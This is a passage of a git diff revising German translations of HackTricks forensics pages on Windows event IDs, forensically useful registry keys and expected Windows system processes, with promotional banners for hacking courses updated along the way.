Einsteckens des USB-Geräts. -Für praktische Beispiele zur Simulation dieser Anmeldetypen und Möglichkeiten zum Auslesen von Anmeldeinformationen siehe [Altered Security's detaillierten Leitfaden](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). +Für praktische Beispiele zur Simulation dieser Anmeldetypen und Möglichkeiten zum Dumping von Anmeldeinformationen siehe [Altered Security's detaillierten Leitfaden](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). -Ereignisdetails, einschließlich Status- und Untertypencodes, liefern weitere Einblicke in die Ereignisursachen, insbesondere bei Ereignis-ID 4625. +Ereignisdetails, einschließlich Status- und Untertypencodes, liefern weitere Einblicke in die Ereignisursachen, besonders bemerkenswert bei Ereignis-ID 4625. ### Wiederherstellung von Windows-Ereignissen @@ -483,15 +484,15 @@ Für einen umfassenden Leitfaden zur Verwendung von Windows-Ereignis-IDs zur Ide #### Brute-Force-Angriffe -Identifizierbar durch mehrere EventID 4625-Einträge, gefolgt von einem EventID 4624, wenn der Angriff erfolgreich ist. +Identifizierbar durch mehrere Ereignis-ID 4625-Einträge, gefolgt von einem Ereignis-ID 4624, wenn der Angriff erfolgreich ist. #### Zeitänderung -Aufgezeichnet durch EventID 4616, können Änderungen an der Systemzeit die forensische Analyse erschweren. +Aufgezeichnet durch Ereignis-ID 4616, können Änderungen an der Systemzeit die forensische Analyse erschweren. #### Verfolgung von USB-Geräten -Nützliche System-EventIDs für die Verfolgung von USB-Geräten sind 20001/20003/10000 für die Erstnutzung, 10100 für Treiberupdates und EventID 112 von DeviceSetupManager für Einsteckzeitstempel. +Nützliche Systemereignis-IDs für die Verfolgung von USB-Geräten sind 20001/20003/10000 für die Erstnutzung, 10100 für Treiberupdates und Ereignis-ID 112 von DeviceSetupManager für Einfügezeitstempel. #### System Power Events EventID 6005 zeigt den Systemstart an, während EventID 6006 den Shutdown markiert. @@ -505,16 +506,17 @@ Sicherheits-EventID 1102 signalisiert die Löschung von Logs, ein kritisches Ere {% embed url="https://websec.nl/" %} +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 7ce70051d..1ec0de631 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,87 +2,107 @@ ### Interessante Windows-Registrierungsschlüssel +{% hint style="success" %} +Lernen Sie und üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie und üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden.
+{% endhint %} ### **Windows-Version und Eigentümerinformationen** -- Unter **`Software\Microsoft\Windows NT\CurrentVersion`** finden Sie die Windows-Version, den Service Pack, die Installationszeit und den Namen des registrierten Eigentümers auf einfache Weise. +- Unter **`Software\Microsoft\Windows NT\CurrentVersion`** finden Sie die Windows-Version, das Service Pack, die Installationszeit und den Namen des registrierten Eigentümers auf einfache Weise. ### **Computername** - Der Hostname befindet sich unter **`System\ControlSet001\Control\ComputerName\ComputerName`**. ### **Zeitzoneneinstellung** -- Die Zeitzoneneinstellung des Systems wird in **`System\ControlSet001\Control\TimeZoneInformation`** gespeichert. +- Die Zeitzoneneinstellung des Systems wird unter **`System\ControlSet001\Control\TimeZoneInformation`** gespeichert. ### **Zugriffszeitverfolgung** - Standardmäßig ist die Verfolgung der letzten Zugriffszeit deaktiviert (**`NtfsDisableLastAccessUpdate=1`**). Um sie zu aktivieren, verwenden Sie: `fsutil behavior set disablelastaccess 0` ### Windows-Versionen und Service Packs -- Die **Windows-Version** gibt die Edition (z. B. Home, Pro) und ihre Veröffentlichung (z. B. Windows 10, Windows 11) an, während **Service Packs** Updates sind, die Fehlerbehebungen und manchmal neue Funktionen enthalten. +- Die **Windows-Version** gibt die Edition an (z. B. Home, Pro) und ihre Veröffentlichung (z. B. Windows 10, Windows 11) an, während **Service Packs** Updates sind, die Fixes und manchmal neue Funktionen enthalten. ### Aktivieren der letzten Zugriffszeit -- Durch das Aktivieren der Verfolgung der letzten Zugriffszeit können Sie sehen, wann Dateien zuletzt geöffnet wurden, was für forensische Analysen oder Systemüberwachung entscheidend sein kann. +- Das Aktivieren der Verfolgung der letzten Zugriffszeit ermöglicht es Ihnen zu sehen, wann Dateien zuletzt geöffnet wurden, was für forensische Analysen oder Systemüberwachung entscheidend sein kann. ### Netzwerkinformationsdetails -- Die Registrierung enthält umfangreiche Daten zu Netzwerkkonfigurationen, einschließlich **Arten von Netzwerken (drahtlos, Kabel, 3G)** und **Netzwerkkategorien (Öffentlich, Privat/Heim, Domäne/Arbeit)**, die für das Verständnis von Netzwerksicherheitseinstellungen und Berechtigungen wichtig sind. +- Die Registrierung enthält umfangreiche Daten zu Netzwerkkonfigurationen, einschließlich **Arten von Netzwerken (drahtlos, Kabel, 3G)** und **Netzwerkkategorien (Öffentlich, Privat/Zuhause, Domäne/Arbeit)**, die für das Verständnis von Netzwerksicherheitseinstellungen und Berechtigungen wichtig sind. -### Clientseitiges Zwischenspeichern (CSC) -- **CSC** verbessert den Offline-Zugriff auf Dateien, indem Kopien freigegebener Dateien zwischengespeichert werden. Unterschiedliche **CSCFlags**-Einstellungen steuern, wie und welche Dateien zwischengespeichert werden, was sich auf Leistung und Benutzererfahrung auswirkt, insbesondere in Umgebungen mit intermittierender Konnektivität. +### Client-seitiges Caching (CSC) +- **CSC** verbessert den Offline-Zugriff auf Dateien, indem Kopien gemeinsam genutzter Dateien zwischengespeichert werden. Unterschiedliche **CSCFlags**-Einstellungen steuern, wie und welche Dateien zwischengespeichert werden, was die Leistung und Benutzererfahrung beeinflusst, insbesondere in Umgebungen mit intermittierender Konnektivität. ### Automatisch startende Programme -- Programme, die in verschiedenen `Run`- und `RunOnce`-Registrierungsschlüsseln aufgeführt sind, werden automatisch beim Start ausgeführt und beeinflussen die Systemstartzeit und können potenziell interessante Punkte zur Identifizierung von Malware oder unerwünschter Software sein. +- Programme, die in verschiedenen `Run`- und `RunOnce`-Registrierungsschlüsseln aufgeführt sind, werden automatisch beim Start ausgeführt, was die Systemstartzeit beeinflusst und potenziell interessante Punkte zur Identifizierung von Malware oder unerwünschter Software sein kann. ### Shellbags -- **Shellbags** speichern nicht nur Einstellungen für Ordneransichten, sondern liefern auch forensische Beweise für den Zugriff auf Ordner, auch wenn der Ordner nicht mehr vorhanden ist. Sie sind für Untersuchungen von unschätzbarem Wert und zeigen Benutzeraktivitäten auf, die auf andere Weise nicht offensichtlich sind. +- **Shellbags** speichern nicht nur Einstellungen für Ordneransichten, sondern liefern auch forensische Beweise für den Zugriff auf Ordner, auch wenn der Ordner nicht mehr existiert. Sie sind für Untersuchungen von unschätzbarem Wert und zeigen Benutzeraktivitäten auf, die auf andere Weise nicht offensichtlich sind. ### USB-Informationen und Forensik -- Die im Registrierungsschlüssel gespeicherten Details zu USB-Geräten können dabei helfen, welche Geräte mit einem Computer verbunden waren, und möglicherweise eine Verbindung eines Geräts mit sensiblen Dateiübertragungen oder unbefugtem Zugriff herstellen. +- Die im Registrierungsspeicher gespeicherten Details zu USB-Geräten können dabei helfen, festzustellen, welche Geräte mit einem Computer verbunden waren, und möglicherweise eine Verbindung eines Geräts zu sensiblen Dateiübertragungen oder unbefugten Zugriffsvorfällen herstellen. -### Volumeseriennummer -- Die **Volumeseriennummer** kann entscheidend sein, um die spezifische Instanz eines Dateisystems zu verfolgen, was in forensischen Szenarien nützlich ist, in denen der Dateiursprung über verschiedene Geräte hinweg ermittelt werden muss. +### Volumenseriennummer +- Die **Volumenseriennummer** kann entscheidend sein, um die spezifische Instanz eines Dateisystems zu verfolgen, was in forensischen Szenarien nützlich ist, in denen die Herkunft einer Datei über verschiedene Geräte hinweg festgestellt werden muss. -### **Shutdown-Details** -- Die Shutdown-Zeit und die Anzahl der Neustarts (nur für XP) werden in **`System\ControlSet001\Control\Windows`** und **`System\ControlSet001\Control\Watchdog\Display`** gespeichert. +### **Herunterfahrdetails** +- Herunterfahrzeit und -anzahl (letztere nur für XP) werden in **`System\ControlSet001\Control\Windows`** und **`System\ControlSet001\Control\Watchdog\Display`** aufbewahrt. ### **Netzwerkkonfiguration** - Für detaillierte Informationen zur Netzwerkschnittstelle siehe **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. - Erste und letzte Netzwerkverbindungsziten, einschließlich VPN-Verbindungen, werden unter verschiedenen Pfaden in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`** protokolliert. ### **Freigegebene Ordner** -- Freigegebene Ordner und Einstellungen befinden sich unter **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Einstellungen für das clientseitige Zwischenspeichern (CSC) bestimmen die Verfügbarkeit von Offline-Dateien. +- Freigegebene Ordner und Einstellungen befinden sich unter **`System\ControlSet001\Services\lanmanserver\Shares`**. Die Einstellungen für das Client-seitige Caching (CSC) bestimmen die Verfügbarkeit von Offline-Dateien. ### **Programme, die automatisch starten** -- Pfade wie **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** und ähnliche Einträge unter `Software\Microsoft\Windows\CurrentVersion` geben Auskunft über Programme, die beim Start ausgeführt werden sollen. +- Pfade wie **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** und ähnliche Einträge unter `Software\Microsoft\Windows\CurrentVersion` geben Details zu Programmen, die beim Start ausgeführt werden sollen. ### **Suchen und eingegebene Pfade** - Explorer-Suchen und eingegebene Pfade werden in der Registrierung unter **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** für WordwheelQuery und TypedPaths verfolgt. ### **Zuletzt verwendete Dokumente und Office-Dateien** -- Zuletzt verwendete Dokumente und aufgerufene Office-Dateien werden in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` und spezifischen Office-Version-Pfaden vermerkt. +- Zuletzt verwendete Dokumente und Office-Dateien werden in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` und spezifischen Office-Version-Pfaden vermerkt. ### **Zuletzt verwendete (MRU) Elemente** - MRU-Listen, die kürzlich verwendete Dateipfade und Befehle anzeigen, werden in verschiedenen `ComDlg32`- und `Explorer`-Unterschlüsseln unter `NTUSER.DAT` gespeichert. ### **Benutzeraktivitätsverfolgung** -- Die Funktion "User Assist" protokolliert detaillierte Statistiken zur Anwendungsnutzung, einschließlich der Anzahl der Ausführungen und der letzten Ausführungszeit, unter **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +- Das User Assist-Feature protokolliert detaillierte Anwendungsstatistiken, einschließlich Ausführungszähler und letzter Ausführungszeit, unter **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. ### **Shellbags-Analyse** -- Shellbags, die Details zum Zugriff auf Ordner anzeigen, werden in `USRCLASS.DAT` und `NTUSER.DAT` unter `Software\Microsoft\Windows\Shell` gespeichert. Verwenden Sie **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** zur Analyse. +- Shellbags, die Details zum Ordnerzugriff anzeigen, werden in `USRCLASS.DAT` und `NTUSER.DAT` unter `Software\Microsoft\Windows\Shell` gespeichert. Verwenden Sie **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** für die Analyse. -### **USB-Geräteverlauf** +### **USB-Gerätehistorie** - **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** und **`HKLM\SYSTEM\ControlSet001\Enum\USB`** enthalten umfangreiche Details zu angeschlossenen USB-Geräten, einschließlich Hersteller, Produktname und Verbindungszeitstempel. - Der Benutzer, der mit einem bestimmten USB-Gerät verbunden ist, kann durch Suche in den `NTUSER.DAT`-Hives nach der **{GUID}** des Geräts ermittelt werden. -- Das zuletzt eingebundene Gerät und seine Volumeseriennummer können über `System\MountedDevices` bzw. `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` verfolgt +- Das zuletzt eingebundene Gerät und seine Volumenseriennummer können über `System\MountedDevices` und `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt` zurückverfolgt werden. + +Dieser Leitfaden fasst die wesentlichen Pfade und Methoden zur Zugriff auf detaillierte Informationen zu Systemen, Netzwerken und Benutzeraktivitäten auf Windows-Systemen zusammen, mit dem Ziel von Klarheit und Benutzerfreundlichkeit. + + + +{% hint style="success" %} +Lernen Sie und üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie und üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Unterstützen Sie HackTricks + +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index bd2ae81c7..5a80ec9e3 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md @@ -1,54 +1,55 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} ## smss.exe -**Session Manager**.\ -Sitzung 0 startet **csrss.exe** und **wininit.exe** (**OS-Dienste**), während Sitzung 1 **csrss.exe** und **winlogon.exe** (**Benutzersitzung**) startet. Sie sollten jedoch **nur einen Prozess** dieser **Binärdatei** ohne Kinder im Prozessbaum sehen. +**Sitzungsmanager**.\ +Sitzung 0 startet **csrss.exe** und **wininit.exe** (**Betriebssystemdienste**), während Sitzung 1 **csrss.exe** und **winlogon.exe** (**Benutzersitzung**) startet. Es sollte jedoch **nur ein Prozess** dieses **Binärdateis** ohne Kinder im Prozessbaum geben. -Außerdem können Sitzungen außerhalb von 0 und 1 bedeuten, dass RDP-Sitzungen stattfinden. +Außerdem können Sitzungen außerhalb von 0 und 1 darauf hinweisen, dass RDP-Sitzungen stattfinden. ## csrss.exe -**Client/Server Run Subsystem Process**.\ -Es verwaltet **Prozesse** und **Threads**, stellt die **Windows-API** für andere Prozesse zur Verfügung und **mappt Laufwerksbuchstaben**, erstellt **Temporärdateien** und behandelt den **Herunterfahrprozess**. +**Client/Server-Laufzeit-Subsystemprozess**.\ +Es verwaltet **Prozesse** und **Threads**, stellt die **Windows-API** für andere Prozesse zur Verfügung und **weist Laufwerksbuchstaben zu**, erstellt **Temporärdateien** und behandelt den **Herunterfahrprozess**. -Es gibt eine **Ausführung in Sitzung 0 und eine weitere in Sitzung 1** (also **2 Prozesse** im Prozessbaum). Ein weiterer wird **pro neue Sitzung** erstellt. +Es gibt einen, der in Sitzung 0 läuft und einen weiteren in Sitzung 1 (also **2 Prozesse** im Prozessbaum). Ein weiterer wird **pro neuer Sitzung erstellt**. ## winlogon.exe **Windows-Anmeldeprozess**.\ -Es ist verantwortlich für Benutzer **An- und Abmeldungen**. Es startet **logonui.exe**, um nach Benutzername und Passwort zu fragen, und ruft dann **lsass.exe** auf, um sie zu überprüfen. +Er ist verantwortlich für Benutzer **An-**/**Abmeldungen**. Er startet **logonui.exe**, um nach Benutzername und Passwort zu fragen, und ruft dann **lsass.exe** auf, um sie zu überprüfen. -Dann startet es **userinit.exe**, die in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** mit dem Schlüssel **Userinit** angegeben ist. +Dann startet er **userinit.exe**, die in **`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`** mit dem Schlüssel **Userinit** angegeben ist. -Darüber hinaus sollte der vorherige Registrierungsschlüssel **explorer.exe** im **Shell-Schlüssel** enthalten, da er sonst als **Malware-Persistenzmethode** missbraucht werden könnte. +Darüber hinaus sollte der vorherige Registrierungseintrag **explorer.exe** im **Shell-Schlüssel** haben, da er sonst als **Malware-Persistenzmethode** missbraucht werden könnte. ## wininit.exe **Windows-Initialisierungsprozess**. \ -Es startet **services.exe**, **lsass.exe** und **lsm.exe** in Sitzung 0. Es sollte nur 1 Prozess geben. +Er startet **services.exe**, **lsass.exe** und **lsm.exe** in Sitzung 0. Es sollte nur 1 Prozess geben. ## userinit.exe -**Userinit-Anmeldeanwendung**.\ -Lädt die **ntuser.dat in HKCU** und initialisiert die **Benutzerumgebung** und führt **Anmelde**-**Skripte** und **GPO** aus. +**Benutzerinit-Anwendungsanmeldung**.\ +Lädt die **ntduser.dat in HKCU** und initialisiert die **Benutzerumgebung** und führt **Anmelde**-**Skripte** und **GPO** aus. Es startet **explorer.exe**. @@ -56,23 +57,23 @@ Es startet **explorer.exe**. ## lsm.exe **Lokaler Sitzungsmanager**.\ -Es arbeitet mit smss.exe zusammen, um Benutzersitzungen zu manipulieren: Anmeldung/Abmeldung, Starten der Shell, Sperren/Entsperren des Desktops usw. +Er arbeitet mit smss.exe zusammen, um Benutzersitzungen zu manipulieren: Anmeldung/Abmeldung, Starten der Shell, Desktop sperren/entsperren usw. Nach W7 wurde lsm.exe in einen Dienst (lsm.dll) umgewandelt. -Es sollte nur 1 Prozess in W7 geben und von ihnen aus wird ein Dienst ausgeführt, der die DLL ausführt. +Es sollte nur 1 Prozess in W7 geben und davon ein Dienst, der die DLL ausführt. ## services.exe **Dienststeuerungs-Manager**.\ -Es **lädt** **als automatisch gestartet** konfigurierte **Dienste** und **Treiber**. +Er **lädt** **Dienste**, die als **automatisch gestartet** und **Treiber** konfiguriert sind. -Es ist der übergeordnete Prozess von **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** und vielen anderen. +Er ist der übergeordnete Prozess von **svchost.exe**, **dllhost.exe**, **taskhost.exe**, **spoolsv.exe** und vielen anderen. -Dienste sind in `HKLM\SYSTEM\CurrentControlSet\Services` definiert und dieser Prozess verwaltet eine im Speicher befindliche Datenbank mit Serviceinformationen, auf die mit sc.exe zugegriffen werden kann. +Dienste sind in `HKLM\SYSTEM\CurrentControlSet\Services` definiert, und dieser Prozess verwaltet eine DB im Speicher mit Dienstinformationen, die von sc.exe abgefragt werden können. -Beachten Sie, wie **einige** **Dienste** in einem **eigenen Prozess** ausgeführt werden und andere einen **svchost.exe-Prozess teilen**. +Beachten Sie, wie **einige** **Dienste** in einem **eigenen Prozess** ausgeführt werden und andere in einem **svchost.exe-Prozess gemeinsam ausgeführt werden**. Es sollte nur 1 Prozess geben. @@ -80,9 +81,9 @@ Es sollte nur 1 Prozess geben. ## lsass.exe **Lokaler Sicherheitsdienst-Subsystem**.\ -Es ist verantwortlich für die Benutzer **Authentifizierung** und erstellt die **Sicherheits-Token**. Es verwendet in `HKLM\System\CurrentControlSet\Control\Lsa` befindliche Authentifizierungspakete. +Er ist verantwortlich für die Benutzer **Authentifizierung** und erstellt die **Sicherheits**-**Token**. Er verwendet in `HKLM\System\CurrentControlSet\Control\Lsa` befindliche Authentifizierungspakete. -Es schreibt in das **Sicherheitsereignisprotokoll** und es sollte nur 1 Prozess geben. +Er schreibt in das **Sicherheits**-**Ereignisprotokoll**, und es sollte nur 1 Prozess geben. Beachten Sie, dass dieser Prozess stark angegriffen wird, um Passwörter auszulesen. @@ -90,31 +91,31 @@ Beachten Sie, dass dieser Prozess stark angegriffen wird, um Passwörter auszule ## svchost.exe **Generischer Diensthostprozess**.\ -Es hostet mehrere DLL-Dienste in einem gemeinsamen Prozess. +Er hostet mehrere DLL-Dienste in einem gemeinsamen Prozess. -Normalerweise wird **svchost.exe** mit dem Flag `-k` gestartet. Dadurch wird eine Abfrage an den Registrierungsschlüssel **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** gesendet, in dem ein Schlüssel mit dem in -k genannten Argument vorhanden ist, der die im selben Prozess zu startenden Dienste enthält. +Normalerweise wird **svchost.exe** mit dem Flag `-k` gestartet. Dies führt eine Abfrage des Registrierungsschlüssels **HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost** durch, in dem ein Schlüssel mit dem im -k genannten Argument enthalten ist, der die Dienste enthält, die im selben Prozess gestartet werden sollen. -Beispiel: `-k UnistackSvcGroup` startet: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` +Zum Beispiel: `-k UnistackSvcGroup` wird starten: `PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc` -Wenn das **Flag `-s`** zusammen mit einem Argument verwendet wird, wird svchost aufgefordert, nur den angegebenen Dienst in diesem Argument zu starten. +Wenn das **Flag `-s`** auch mit einem Argument verwendet wird, wird svchost aufgefordert, **nur den angegebenen Dienst** in diesem Argument zu starten. -Es wird mehrere Prozesse von `svchost.exe` geben. Wenn einer von ihnen **das `-k`-Flag nicht verwendet**, ist das sehr verdächtig. Wenn Sie feststellen, dass **services.exe nicht der übergeordnete Prozess** ist, ist das ebenfalls sehr verdächtig. +Es wird mehrere Prozesse von `svchost.exe` geben. Wenn einer von ihnen **nicht das `-k`-Flag verwendet**, ist das sehr verdächtig. Wenn Sie feststellen, dass **services.exe nicht der übergeordnete Prozess** ist, ist das ebenfalls sehr verdächtig. ## taskhost.exe Dieser Prozess fungiert als Host für Prozesse, die aus DLLs ausgeführt werden. Er lädt auch die Dienste, die aus DLLs ausgeführt werden. -In W8 wird dies als taskhostex.exe und in W10 als taskhostw.exe bezeichnet. +In W8 wird dies taskhostex.exe genannt und in W10 taskhostw.exe. ## explorer.exe Dies ist der Prozess, der für den **Desktop des Benutzers** und das Starten von Dateien über Dateierweiterungen verantwortlich ist. -Es sollte **nur 1** Prozess pro angemeldetem Benutzer erstellt werden. +Es sollte **nur 1** Prozess pro angemeldetem Benutzer gestartet werden. -Dies wird von **userinit.exe** ausgeführt, das beendet sein sollte, daher sollte für diesen Prozess kein übergeordneter Prozess angezeigt werden. +Dies wird von **userinit.exe** ausgeführt, das beendet werden sollte, sodass für diesen Prozess **kein übergeordneter Prozess** erscheinen sollte. # Erfassen von bösartigen Prozessen @@ -125,15 +126,20 @@ Dies wird von **userinit.exe** ausgeführt, das beendet sein sollte, daher sollt * Ist es korrekt geschrieben? * Wird es unter der erwarteten SID ausgeführt? * Ist der übergeordnete Prozess der erwartete (falls vorhanden)? -* Sind die Kindprozesse die erwarteten? (kein cmd.exe, wscript.exe, powershell.exe..?) +* Sind die untergeordneten Prozesse die erwarteten? (kein cmd.exe, wscript.exe, powershell.exe..?) +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
